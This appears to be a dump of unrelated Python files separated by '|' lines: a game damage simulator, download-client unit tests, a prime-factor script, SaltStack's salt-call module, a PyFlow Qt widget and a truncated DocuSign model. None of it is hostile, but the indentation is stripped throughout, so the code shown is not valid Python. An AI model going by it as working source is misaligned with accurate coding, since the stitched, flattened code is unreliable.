conf['slots.poison.a'] = Heralds_of_Hinomoto()+The_Plaguebringer()
conf['acl'] = """
`s3, not self.s3_buff
`s2
`dragon, not self.dragondrive_buff.get()
`s1, x=5
"""
coab = ['Wand','Berserker','Curran']
def prerun(self):
self.dragondrive_buff = Selfbuff('dragondrive', 0.30, -1, 's', 'passive')
self.dragonform.set_dragondrive(self.dragondrive_buff)
self.a3_str = Modifier('a3', 'att', 'passive', 0.20)
self.s2_str = Selfbuff('s2', 0.20, -1, 'att', 'buff') # doesnt proc doublebuff reeeee
self.s2_tick = Timer(self.s2_degen, 2.9, 1)
self.s2_stuff_timer = Timer(self.s2_stuff_off)
self.s2_on = False
self.hp = 100
self.conf.x1.utp = 120
self.conf.x2.utp = 120
self.conf.x3.utp = 120
self.conf.x4.utp = 180
self.conf.x5.utp = 180
def d_slots(self):
if self.duration <= 60:
self.conf['slots.a'] = The_Chocolatiers()+TL()
self.conf['slots.poison.a'] = The_Chocolatiers()+The_Plaguebringer()
def x_proc(self, e):
if self.dragondrive_buff.get():
try:
utp = self.conf[e.name].utp
self.dragonform.charge_gauge(utp, utp=True)
except:
pass
def s1_proc(self, e):
if self.dragondrive_buff.get():
with CrisisModifier('s1', 1.00, self.hp):
self.dmg_make('s1', 2.42*4)
self.dragonform.add_drive_gauge_time(self.s1.ac.getstartup()+self.s1.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(-750, utp=True)
self.s1.charge(self.sp_convert(0.50, self.conf.s1.sp))
else:
self.dmg_make('s1', 2.42*4)
# 242 * 4 mod, 4 hits, 2.4s
# 242 * 4 w/ 2x crisis
# -750 dd points
# +50% skill gauge
# 2.1666667461395264
def s2_proc(self, e):
if self.dragondrive_buff.get():
self.s2_stuff_on()
self.s2_stuff_timer.on(40 * self.mod('bt'))
self.dragonform.add_drive_gauge_time(self.s2.ac.getstartup()+self.s2.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(3000, utp=True)
else:
self.dragonform.charge_gauge(1200, utp=True)
# 1 hp loss = 1 gauge gain, will assume 3000 max hp here
if self.hp > 30:
self.dragonform.charge_gauge(3000 * (self.hp-30)/100, utp=True)
self.hp = 30
# +1200 dd points
# 1.3333333730697632s
def s2_stuff_on(self):
self.a3_str.on()
self.s2_str.on()
self.s2_tick.on()
def s2_stuff_off(self, t):
self.a3_str.off()
self.s2_str.off()
self.s2_tick.off()
def s2_degen(self, t):
self.hp = max(self.hp-6, 0)
if __name__ == '__main__':
from core.simulate import test_with_argv
test_with_argv(None, *sys.argv)
|
# coding: utf-8
import io
import os
import shutil
import tempfile
import unittest
from edo_client import WoClient
class ContentApi_DownloadTestCase(unittest.TestCase):
'''
- Basically this is to ensure
all the facilities related to HTTP range headers are working properly;
'''
@classmethod
def setUpClass(cls):
cls.file_size = 10 * (2 ** 20)
cls.download_url = 'http://192.168.1.115/docker/unittest/10mb.test'
cls.api_url = 'https://httpbin.org/redirect-to?url={}'.format(
cls.download_url
)
cls.empty_file_url = 'http://192.168.1.115/docker/unittest/empty_file.bin'
# We're just testing some basic util functions,
# and don't want a real WoClient instance
cls.client = WoClient(
cls.api_url + '#',
'', '', '', '',
account='', instance=''
)
cls.tmpdir = tempfile.mkdtemp()
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.tmpdir)
def test_01_get_download_url(self):
self.assertEqual(
self.client.content.get_download_url(uid=''),
self.download_url,
'Should be able to extract direct download URL from 302 redirect'
)
def test_11_download_to_stream_all(self):
'''测试:下载完整文件到流'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url
)
self.assertEqual(
self.file_size,
stream.tell(),
'Cursor should be at the end of stream after download'
)
stream.seek(0, os.SEEK_SET)
self.assertEqual(
self.file_size,
len(stream.read()),
'File length should be 10240 bytes'
)
def test_12_download_stream_first_byte(self):
'''测试:下载第一个字节到流'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url, start=0, end=0,
)
self.assertEqual(1, stream.tell(), 'Download first byte of file')
def test_13_download_stream_head_part(self):
'''测试:从头下载一部分到流'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url, start=0, end=(5 * (2 ** 20) - 1),
)
self.assertEqual(5 * (2 ** 20), stream.tell())
def test_14_download_stream_tail_part(self):
'''测试:从中间开始,下载文件后半部分到流'''
stream = io.BytesIO()
self.client.content.download_to_stream(
stream, url=self.download_url, start=(5 * (2 ** 20)), end=None,
)
self.assertEqual(5 * (2 ** 20), stream.tell())
def test_15_download_partial(self):
'''测试:从中间开始,下载一部分到流'''
stream = io.BytesIO()
start, end = 1234, 54321
self.client.content.download_to_stream(
stream, url=self.download_url, start=start, end=end,
)
self.assertEqual(stream.tell(), end - start + 1)
def test_21_get_data_full_size(self):
'''测试:完整读取文件内容'''
self.assertEqual(
self.file_size,
len(self.client.content.get_data(url=self.download_url)),
'.get_data shoule be able to download the whole file by default',
)
def test_22_get_data_first_byte(self):
'''测试:读取文件第一个字节'''
self.assertEqual(
1,
len(self.client.content.get_data(url=self.download_url, size=1)),
'.get_data should be able to download the 1st byte of given file',
)
def test_23_get_data_head_part(self):
'''测试:从头读取文件的一部分内容'''
size = 5432
self.assertEqual(
size,
len(self.client.content.get_data(url=self.download_url, size=size)), # noqa E501
'.get_data should download the first {} bytes'.format(size),
)
def test_24_get_data_tail_part(self):
'''测试:从中间开始,读取文件后半部分内容'''
start = 12345
size = self.file_size - start
self.assertEqual(
size,
len(self.client.content.get_data(
url=self.download_url,
offset=start, size=size
)),
'.get_data shoule download last {} bytes'.format(size),
)
def test_25_get_data_partial(self):
'''测试:从中间开始,读取文件一部分的内容'''
start = 23451
size = self.file_size - start
self.assertEqual(
size,
len(self.client.content.get_data(
url=self.download_url,
offset=start, size=size,
)),
'.get_data should download {} bytes starting from offset {}'.format(size, start), # noqa E501
)
def test_31_download_to_file(self):
'''测试:完整下载文件到本地'''
fd, fpath = tempfile.mkstemp(dir=self.tmpdir)
os.close(fd)
self.client.content.download_to_file(destination=fpath, url=self.download_url)
self.assertEqual(self.file_size, os.stat(fpath).st_size)
def test_41_download_empty_file(self):
'''测试:下载空文件到本地'''
fd, fpath = tempfile.mkstemp(dir=self.tmpdir)
os.close(fd)
self.client.content.download_to_file(destination=fpath, url=self.empty_file_url)
self.assertEqual(0, os.stat(fpath).st_size)
|
n=int(input('enter no.'))
factors = []
while n % 2 == 0:
factors.append(2)
n//=2
divisor=3
while n!=1 and divisor <=n:
if n% divisor == 0:
factors.append(divisor)
n//=divisor
else:
divisor+=2
print('prime factors is')
for i in range (len(factors)):
print(factors[i], end=" ")
|
# -*- coding: utf-8 -*-
'''
The caller module is used as a front-end to manage direct calls to the salt
minion modules.
'''
# Import python libs
from __future__ import print_function
import os
import sys
import logging
import datetime
import traceback
# Import salt libs
import salt.exitcodes
import salt.loader
import salt.minion
import salt.output
import salt.payload
import salt.transport
import salt.utils.args
from salt._compat import string_types
from salt.log import LOG_LEVELS
from salt.utils import print_cli
log = logging.getLogger(__name__)
try:
from raet import raeting, nacling
from raet.lane.stacking import LaneStack
from raet.lane.yarding import RemoteYard
except ImportError:
# Don't die on missing transport libs since only one transport is required
pass
# Custom exceptions
from salt.exceptions import (
SaltClientError,
CommandNotFoundError,
CommandExecutionError,
SaltInvocationError,
)
class Caller(object):
'''
Factory class to create salt-call callers for different transport
'''
@staticmethod
def factory(opts, **kwargs):
# Default to ZeroMQ for now
ttype = 'zeromq'
# determine the ttype
if 'transport' in opts:
ttype = opts['transport']
elif 'transport' in opts.get('pillar', {}).get('master', {}):
ttype = opts['pillar']['master']['transport']
# switch on available ttypes
if ttype == 'zeromq':
return ZeroMQCaller(opts, **kwargs)
elif ttype == 'raet':
return RAETCaller(opts, **kwargs)
else:
raise Exception('Callers are only defined for ZeroMQ and raet')
# return NewKindOfCaller(opts, **kwargs)
class ZeroMQCaller(object):
'''
Object to wrap the calling of local salt modules for the salt-call command
'''
def __init__(self, opts):
'''
Pass in the command line options
'''
self.opts = opts
self.opts['caller'] = True
self.serial = salt.payload.Serial(self.opts)
# Handle this here so other deeper code which might
# be imported as part of the salt api doesn't do a
# nasty sys.exit() and tick off our developer users
try:
self.minion = salt.minion.SMinion(opts)
except SaltClientError as exc:
raise SystemExit(str(exc))
def call(self):
'''
Call the module
'''
# raet channel here
ret = {}
fun = self.opts['fun']
ret['jid'] = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.now())
proc_fn = os.path.join(
salt.minion.get_proc_dir(self.opts['cachedir']),
ret['jid']
)
if fun not in self.minion.functions:
sys.stderr.write('Function {0} is not available\n'.format(fun))
sys.exit(-1)
try:
sdata = {
'fun': fun,
'pid': os.getpid(),
'jid': ret['jid'],
'tgt': 'salt-call'}
args, kwargs = salt.minion.load_args_and_kwargs(
self.minion.functions[fun],
salt.utils.args.parse_input(self.opts['arg']),
data=sdata)
try:
with salt.utils.fopen(proc_fn, 'w+b') as fp_:
fp_.write(self.serial.dumps(sdata))
except NameError:
# Don't require msgpack with local
pass
except IOError:
sys.stderr.write(
'Cannot write to process directory. '
'Do you have permissions to '
'write to {0} ?\n'.format(proc_fn))
func = self.minion.functions[fun]
try:
ret['return'] = func(*args, **kwargs)
except TypeError as exc:
trace = traceback.format_exc()
sys.stderr.write('Passed invalid arguments: {0}\n'.format(exc))
active_level = LOG_LEVELS.get(
self.opts['log_level'].lower(), logging.ERROR)
if active_level <= logging.DEBUG:
sys.stderr.write(trace)
sys.exit(salt.exitcodes.EX_GENERIC)
try:
ret['retcode'] = sys.modules[
func.__module__].__context__.get('retcode', 0)
except AttributeError:
ret['retcode'] = 1
except (CommandExecutionError) as exc:
msg = 'Error running \'{0}\': {1}\n'
active_level = LOG_LEVELS.get(
self.opts['log_level'].lower(), logging.ERROR)
if active_level <= logging.DEBUG:
sys.stderr.write(traceback.format_exc())
sys.stderr.write(msg.format(fun, str(exc)))
sys.exit(salt.exitcodes.EX_GENERIC)
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found: {1}\n'
sys.stderr.write(msg.format(fun, str(exc)))
sys.exit(salt.exitcodes.EX_GENERIC)
try:
os.remove(proc_fn)
except (IOError, OSError):
pass
if hasattr(self.minion.functions[fun], '__outputter__'):
oput = self.minion.functions[fun].__outputter__
if isinstance(oput, string_types):
ret['out'] = oput
is_local = self.opts['local'] or self.opts.get(
'file_client', False) == 'local'
returners = self.opts.get('return', '').split(',')
if (not is_local) or returners:
ret['id'] = self.opts['id']
ret['fun'] = fun
ret['fun_args'] = self.opts['arg']
for returner in returners:
try:
ret['success'] = True
self.minion.returners['{0}.returner'.format(returner)](ret)
except Exception:
pass
# return the job infos back up to the respective minion's master
if not is_local:
try:
mret = ret.copy()
mret['jid'] = 'req'
self.return_pub(mret)
except Exception:
pass
# close raet channel here
return ret
def return_pub(self, ret):
'''
Return the data up to the master
'''
channel = salt.transport.Channel.factory(self.opts, usage='salt_call')
load = {'cmd': '_return', 'id': self.opts['id']}
for key, value in ret.items():
load[key] = value
channel.send(load)
def print_docs(self):
'''
Pick up the documentation for all of the modules and print it out.
'''
docs = {}
for name, func in self.minion.functions.items():
if name not in docs:
if func.__doc__:
docs[name] = func.__doc__
for name in sorted(docs):
if name.startswith(self.opts.get('fun', '')):
print_cli('{0}:\n{1}\n'.format(name, docs[name]))
def print_grains(self):
'''
Print out the grains
'''
grains = salt.loader.grains(self.opts)
salt.output.display_output({'local': grains}, 'grains', self.opts)
def run(self):
'''
Execute the salt call logic
'''
try:
ret = self.call()
out = ret.get('out', 'nested')
if self.opts['metadata']:
print_ret = ret
out = 'nested'
else:
print_ret = ret.get('return', {})
salt.output.display_output(
{'local': print_ret},
out,
self.opts)
if self.opts.get('retcode_passthrough', False):
sys.exit(ret['retcode'])
except SaltInvocationError as err:
raise SystemExit(err)
class RAETCaller(ZeroMQCaller):
'''
Object to wrap the calling of local salt modules for the salt-call command
when transport is raet
'''
def __init__(self, opts):
'''
Pass in the command line options
'''
self.stack = self._setup_caller_stack(opts)
salt.transport.jobber_stack = self.stack
super(RAETCaller, self).__init__(opts)
def run(self):
'''
Execute the salt call logic
'''
try:
ret = self.call()
self.stack.server.close()
salt.transport.jobber_stack = None
if self.opts['metadata']:
print_ret = ret
else:
print_ret = ret.get('return', {})
salt.output.display_output(
{'local': print_ret},
ret.get('out', 'nested'),
self.opts)
if self.opts.get('retcode_passthrough', False):
sys.exit(ret['retcode'])
except SaltInvocationError as err:
raise SystemExit(err)
def _setup_caller_stack(self, opts):
'''
Setup and return the LaneStack and Yard used by by channel when global
not already setup such as in salt-call to communicate to-from the minion
'''
mid = opts['id']
sockdirpath = opts['sock_dir']
uid = nacling.uuid(size=18)
name = 'caller' + uid
stack = LaneStack(name=name,
lanename=mid,
sockdirpath=sockdirpath)
stack.Pk = raeting.packKinds.pack
stack.addRemote(RemoteYard(stack=stack,
name='manor',
lanename=mid,
dirpath=sockdirpath))
log.debug("Created Caller Jobber Stack {0}\n".format(stack.name))
return stack
|
## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from nine import str
from PyFlow.UI.Canvas.UICommon import clearLayout
from PyFlow.UI.Widgets.EditPropertiesWidget import EditPropertiesTreeWidget
from PyFlow.UI.Widgets.EditSecurityRatingWidget import EditSecurityRatingTreeWidget
from Qt import QtWidgets
from Qt import QtCore, QtGui
# Framework
class HeadButton(QtWidgets.QPushButton):
"""docstring for HeadButton."""
def __init__(self, parent=None, maxHeight=25):
super(HeadButton, self).__init__(parent)
self.setObjectName(self.__class__.__name__)
self.setDefault(True)
self.setMaximumHeight(maxHeight)
class CollapsibleWidget(QtWidgets.QWidget):
"""Has content widget and button on top to hide or show content"""
def __init__(self, parent=None, headName="Collapse", noSpacer=True, collapsed=False):
super(CollapsibleWidget, self).__init__(parent)
self.setObjectName(self.__class__.__name__)
self.setupUi()
self.connectUi()
self.setButtonName(headName)
if noSpacer:
self.removeSpacer()
self.setCollapsed(collapsed)
def filterContent(self, pattern):
pass
def title(self):
return self.pbHead.text()
def setReadOnly(self, bReadOnly=True):
self.ContentWidget.setEnabled(not bReadOnly)
def connectUi(self):
self.pbHead.clicked.connect(self.toggleCollapsed)
def setupUi(self):
self.resize(400, 300)
self.mainVLayout = QtWidgets.QVBoxLayout(self)
self.mainVLayout.setSpacing(2)
self.mainVLayout.setContentsMargins(2, 2, 2, 2)
self.mainVLayout.setObjectName("mainVLayout")
self.mainVLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.pbHead = HeadButton(self)
self.mainVLayout.addWidget(self.pbHead)
self.setMinimumHeight(30)
self.ContentWidget = QtWidgets.QWidget(self)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ContentWidget.sizePolicy().hasHeightForWidth())
self.ContentWidget.setSizePolicy(sizePolicy)
self.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred))
self.ContentWidget.setObjectName("ContentWidget")
self.ContentWidget.setContentsMargins(10, 0, 0, 0)
self.mainVLayout.addWidget(self.ContentWidget)
self.spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.mainVLayout.addItem(self.spacerItem)
self.setWindowTitle(self.objectName())
self.pbHead.setStyleSheet(self.pbHead.styleSheet() + "\nText-align:left;")
self.contentHiddenIcon = self.pbHead.style().standardIcon(QtWidgets.QStyle.SP_TitleBarUnshadeButton)
self.contentVisibleIcon = self.pbHead.style().standardIcon(QtWidgets.QStyle.SP_TitleBarShadeButton)
self.updateIcon()
def addWidget(self, widget):
self.mainVLayout.addWidget(widget)
def removeSpacer(self):
if self.spacerItem is not None:
self.mainVLayout.removeItem(self.spacerItem)
del self.spacerItem
self.spacerItem = None
def setContentHiddenIcon(self, icon):
self.contentHiddenIcon = icon
def setContentVisibleIcon(self, icon):
self.contentVisibleIcon = icon
def toggleCollapsed(self):
if self.ContentWidget.isVisible():
self.setCollapsed(True)
else:
self.setCollapsed(False)
def setButtonName(self, name):
self.pbHead.setText(name)
def isCollapsed(self):
return self.ContentWidget.isHidden()
def updateIcon(self):
if self.isCollapsed():
self.pbHead.setIcon(self.contentHiddenIcon)
else:
self.pbHead.setIcon(self.contentVisibleIcon)
def setCollapsed(self, bCollapsed=False):
self.ContentWidget.setVisible(not bCollapsed)
self.updateIcon()
class PropertyEntry(QtWidgets.QWidget):
"""docstring for PropertyEntry."""
def __init__(self, label, widget, parent=None, hideLabel=False, maxLabelWidth=None, toolTip=""):
super(PropertyEntry, self).__init__(parent)
self.label = label
self.layout = QtWidgets.QHBoxLayout(self)
self.layout.setContentsMargins(1, 1, 1, 1)
if not hideLabel:
label = QtWidgets.QLabel(label + ":")
label.setStyleSheet("font: bold")
label.setToolTip(toolTip)
if not maxLabelWidth:
label.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred))
else:
label.setMaximumWidth(maxLabelWidth)
self.layout.addWidget(label)
self.layout.addWidget(widget)
self.index = -1
def getLabel(self):
return self.label
class CollapsibleFormWidget(CollapsibleWidget):
def __init__(self, parent=None, headName="Collapse", noSpacer=True, collapsed=False, hideLabels=False):
super(CollapsibleFormWidget, self).__init__(parent, headName=headName, noSpacer=noSpacer, collapsed=collapsed)
self.hideLabels = hideLabels
self.Layout = QtWidgets.QVBoxLayout(self.ContentWidget)
self.Layout.setObjectName("CollapseWidgetFormLayout")
self.Layout.setSpacing(2)
self.Layout.setContentsMargins(0, 0, 0, 5)
self.propertyNames = {}
self.entryNames = {}
self.updateIcon()
self.groups = {}
def setSpacing(self, spacing=2):
self.Layout.setSpacing(spacing)
def isAllWidgetsHidden(self):
count = self.Layout.count()
hidden = 0
for i in range(count):
widget = self.Layout.itemAt(i).widget()
if widget.isHidden():
hidden += 1
return count == hidden
def filterContent(self, pattern):
count = self.Layout.count()
for key, value in self.entryNames.items():
if isinstance(value, PropertyEntry):
value.setVisible(pattern.lower() in value.getLabel().lower())
for key, value in self.groups.items():
if isinstance(value, CollapSibleGoupBox):
if value.isAllWidgetsHidden():
value.hide()
else:
value.show()
value.setCollapsed(False)
def insertWidget(self, index=0, label=None, widget=None, maxLabelWidth=None, group=None):
if widget is None or isinstance(widget, CollapsibleWidget):
return False
if group is not None and group != "":
if group in self.groups:
groupW = self.groups[group]
else:
groupW = CollapSibleGoupBox(group)
self.groups[group] = groupW
entry = PropertyEntry(str(label), widget, hideLabel=self.hideLabels, maxLabelWidth=maxLabelWidth)
self.propertyNames[label] = widget
self.entryNames[label] = entry
if group is None or group == "":
self.Layout.insertWidget(index, entry)
else:
groupW.insertWidget(index, entry)
self.Layout.addWidget(groupW)
return True
def addWidget(self, label=None, widget=None, maxLabelWidth=None, group=None):
if widget is None or isinstance(widget, CollapsibleWidget):
return False
if group is not None and group != "":
if group in self.groups:
groupW = self.groups[group]
else:
groupW = CollapSibleGoupBox(group)
self.groups[group] = groupW
self.propertyNames[label] = widget
entry = PropertyEntry(str(label), widget, hideLabel=self.hideLabels, maxLabelWidth=maxLabelWidth, toolTip=widget.toolTip())
self.entryNames[label] = entry
if group is None or group == "":
self.Layout.addWidget(entry)
else:
groupW.addWidget(entry)
self.Layout.addWidget(groupW)
return True
def getWidgetByName(self, name):
if name in self.propertyNames:
return self.propertyNames[name]
else:
return None
class CollapSibleGoupBox(QtWidgets.QWidget):
def __init__(self,name):
super(CollapSibleGoupBox, self).__init__()
# widgets
self.controlGroup = QtWidgets.QGroupBox()
self.controlGroup.setTitle(name)
self.controlGroup.setCheckable(True)
self.controlGroup.setChecked(True)
# groupbox layout
self.groupLayout = QtWidgets.QVBoxLayout(self.controlGroup)
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
# signals
self.controlGroup.toggled.connect(
lambda: self.toggleCollapsed())
# layout
self.mainLayout = QtWidgets.QGridLayout(self)
self.mainLayout.addWidget(self.controlGroup)
def isAllWidgetsHidden(self):
count = self.groupLayout.count()
hidden = 0
for i in range(count):
widget = self.groupLayout.itemAt(i).widget()
if widget.isHidden():
hidden += 1
return count == hidden
def insertWidget(self,index,widget):
self.groupLayout.insertWidget(index,widget)
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
def addWidget(self,widget):
self.groupLayout.addWidget(widget)
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
def toggleCollapsed(self):
state = self.controlGroup.isChecked()
if state:
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
else:
self.controlGroup.setFixedHeight(30)
def setCollapsed(self, bCollapsed=False):
self.controlGroup.setChecked(not bCollapsed)
if not bCollapsed:
self.controlGroup.setFixedHeight(self.controlGroup.sizeHint().height())
else:
self.controlGroup.setFixedHeight(30)
class PropertiesWidget(QtWidgets.QWidget):
"""docstring for PropertiesWidget."""
spawnDuplicate = QtCore.Signal()
def __init__(self, parent=None, searchByHeaders=False):
super(PropertiesWidget, self).__init__(parent)
self.setWindowTitle("Properties view")
self.mainLayout = QtWidgets.QVBoxLayout(self)
self.mainLayout.setObjectName("propertiesMainLayout")
self.mainLayout.setContentsMargins(2, 2, 2, 2)
self.searchBox = QtWidgets.QLineEdit(self)
self.searchBox.setObjectName("lineEdit")
self.searchBox.setPlaceholderText(str("search..."))
self.searchBox.textChanged.connect(self.filterByHeaders if searchByHeaders else self.filterByHeadersAndFields)
self.searchBoxWidget = QtWidgets.QWidget()
self.searchBoxLayout = QtWidgets.QHBoxLayout(self.searchBoxWidget)
self.searchBoxLayout.setContentsMargins(1, 1, 1, 1)
self.searchBoxLayout.addWidget(self.searchBox)
# self.settingsButton = QtWidgets.QToolButton()
# self.settingsButton.setIcon(QtGui.QIcon(":/settings.png"))
# self.settingsMenu = QtWidgets.QMenu()
# self.editPropertiesAction = QtWidgets.QAction("Edit Parameter Interface", None)
# self.settingsMenu.addAction(self.editPropertiesAction)
# self.settingsButton.setMenu(self.settingsMenu)
# self.editPropertiesAction.triggered.connect(self.showPropertyEditor)
#self.settingsButton.clicked.connect(self.spawnDuplicate.emit)
# self.settingsButton.setPopupMode(QtWidgets.QToolButton.InstantPopup)
self.lockCheckBox = QtWidgets.QToolButton()
self.lockCheckBox.setCheckable(True)
self.lockCheckBox.setIcon(QtGui.QIcon(':/unlocked.png'))
self.lockCheckBox.toggled.connect(self.changeLockIcon)
self.searchBoxLayout.addWidget(self.lockCheckBox)
self.tearOffCopy = QtWidgets.QToolButton()
self.tearOffCopy.setIcon(QtGui.QIcon(":/tear_off_copy_bw.png"))
self.tearOffCopy.clicked.connect(self.spawnDuplicate.emit)
self.searchBoxLayout.addWidget(self.tearOffCopy)
self.mainLayout.addWidget(self.searchBoxWidget)
self.searchBoxWidget.hide()
self.contentLayout = QtWidgets.QVBoxLayout()
self.contentLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.mainLayout.addLayout(self.contentLayout)
self.spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.mainLayout.addItem(self.spacerItem)
self.mainLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding))
def changeLockIcon(self,checked):
if checked:
self.lockCheckBox.setIcon(QtGui.QIcon(':/locked.png'))
else:
self.lockCheckBox.setIcon(QtGui.QIcon(':/unlocked.png'))
def setLockCheckBoxVisible(self, bVisible):
self.lockCheckBox.setVisible(bVisible)
def setTearOffCopyVisible(self, bVisible):
self.tearOffCopy.setVisible(bVisible)
def setSearchBoxVisible(self, bVisible):
self.searchBox.setVisible(bVisible)
def filterByHeaders(self, text):
count = self.contentLayout.count()
for i in range(count):
item = self.contentLayout.itemAt(i)
w = item.widget()
if w:
if text.lower() in w.title().lower():
w.show()
else:
w.hide()
def filterByHeadersAndFields(self, text):
count = self.contentLayout.count()
for i in range(count):
item = self.contentLayout.itemAt(i)
w = item.widget()
if w:
w.filterContent(text)
if w.isAllWidgetsHidden():
w.hide()
else:
w.show()
w.setCollapsed(False)
def isLocked(self):
return self.lockCheckBox.isChecked() == True
def clear(self):
if not self.isLocked():
clearLayout(self.contentLayout)
self.searchBoxWidget.hide()
self.lockCheckBox.setChecked(False)
def insertWidget(self, collapsibleWidget,index):
if not self.isLocked():
if isinstance(collapsibleWidget, CollapsibleFormWidget):
self.searchBoxWidget.show()
self.contentLayout.insertWidget(index, collapsibleWidget)
return True
def addWidget(self, collapsibleWidget):
if not self.isLocked():
if isinstance(collapsibleWidget, CollapsibleFormWidget):
self.searchBoxWidget.show()
self.contentLayout.insertWidget(-1, collapsibleWidget)
return True
def showPropertyEditor(self):
tree = EditPropertiesTreeWidget()
count = self.contentLayout.count()
folders = {}
for i in range(count):
item = self.contentLayout.itemAt(i)
w = item.widget()
if w:
if w.title() in ["Inputs"]:
for key,group in w.groups.items():
if key not in folders:
folders[key] = {}
#for e in range(group.groupLayout.count()):
# w = group.groupLayout.itemAt(e).widget()
# folders[key][w.getLabel()] = group.groupLayout.itemAt(e).widget()
for fold in folders:
folder = tree.addFolder(fold)
#for widg in folders[fold]:
# child = tree.addNormal(widg,folder)
d = QtWidgets.QDialog()
d.setLayout(QtWidgets.QHBoxLayout())
d.layout().addWidget(tree)
d.exec_()
newOrder = tree.model_to_dict()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
s = QtWidgets.QScrollArea()
pw = PropertiesWidget()
rootWidget = CollapsibleFormWidget(headName="Settings", noSpacer=True)
rootWidget.addWidget("test", QtWidgets.QPushButton("ss"))
rootWidget.addWidget("foo", QtWidgets.QPushButton(""))
rootWidget.addWidget("bar", QtWidgets.QPushButton(""))
rootWidget2 = CollapsibleFormWidget(headName="Test", noSpacer=True)
rootWidget2.addWidget("test2", QtWidgets.QPushButton("aa"))
pw.addWidget(rootWidget)
pw.addWidget(rootWidget2)
s.setWidget(pw)
s.show()
pw.clear()
sys.exit(app.exec_())
|
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class EmailAddress(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, anchor_case_sensitive=None, anchor_horizontal_alignment=None, anchor_ignore_if_not_present=None, anchor_match_whole_word=None, anchor_string=None, anchor_units=None, anchor_x_offset=None, anchor_y_offset=None, bold=None, conditional_parent_label=None, conditional_parent_value=None, custom_tab_id=None, document_id=None, error_details=None, font=None, font_color=None, font_size=None, italic=None, merge_field=None, name=None, page_number=None, recipient_id=None, status=None, tab_group_labels=None, tab_id=None, tab_label=None, tab_order=None, template_locked=None, template_required=None, tooltip=None, underline=None, value=None, x_position=None, y_position=None):
"""
EmailAddress - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'anchor_case_sensitive': 'str',
'anchor_horizontal_alignment': 'str',
'anchor_ignore_if_not_present': 'str',
'anchor_match_whole_word': 'str',
'anchor_string': 'str',
'anchor_units': 'str',
'anchor_x_offset': 'str',
'anchor_y_offset': 'str',
'bold': 'str',
'conditional_parent_label': 'str',
'conditional_parent_value': 'str',
'custom_tab_id': 'str',
'document_id': 'str',
'error_details': 'ErrorDetails',
'font': 'str',
'font_color': 'str',
'font_size': 'str',
'italic': 'str',
'merge_field': 'MergeField',
'name': 'str',
'page_number': 'str',
'recipient_id': 'str',
'status': 'str',
'tab_group_labels': 'list[str]',
'tab_id': 'str',
'tab_label': 'str',
'tab_order': 'str',
'template_locked': 'str',
'template_required': 'str',
'tooltip': 'str',
'underline': 'str',
'value': 'str',
'x_position': 'str',
'y_position': 'str'
}
self.attribute_map = {
'anchor_case_sensitive': 'anchorCaseSensitive',
'anchor_horizontal_alignment': 'anchorHorizontalAlignment',
'anchor_ignore_if_not_present': 'anchorIgnoreIfNotPresent',
'anchor_match_whole_word': 'anchorMatchWholeWord',
'anchor_string': 'anchorString',
'anchor_units': 'anchorUnits',
'anchor_x_offset': 'anchorXOffset',
'anchor_y_offset': 'anchorYOffset',
'bold': 'bold',
'conditional_parent_label': 'conditionalParentLabel',
'conditional_parent_value': 'conditionalParentValue',
'custom_tab_id': 'customTabId',
'document_id': 'documentId',
'error_details': 'errorDetails',
'font': 'font',
'font_color': 'fontColor',
'font_size': 'fontSize',
'italic': 'italic',
'merge_field': 'mergeField',
'name': 'name',
'page_number': 'pageNumber',
'recipient_id': 'recipientId',
'status': 'status',
'tab_group_labels': 'tabGroupLabels',
'tab_id': 'tabId',
'tab_label': 'tabLabel',
'tab_order': 'tabOrder',
'template_locked': 'templateLocked',
'template_required': 'templateRequired',
'tooltip': 'tooltip',
'underline': 'underline',
'value': 'value',
'x_position': 'xPosition',
'y_position': 'yPosition'
}
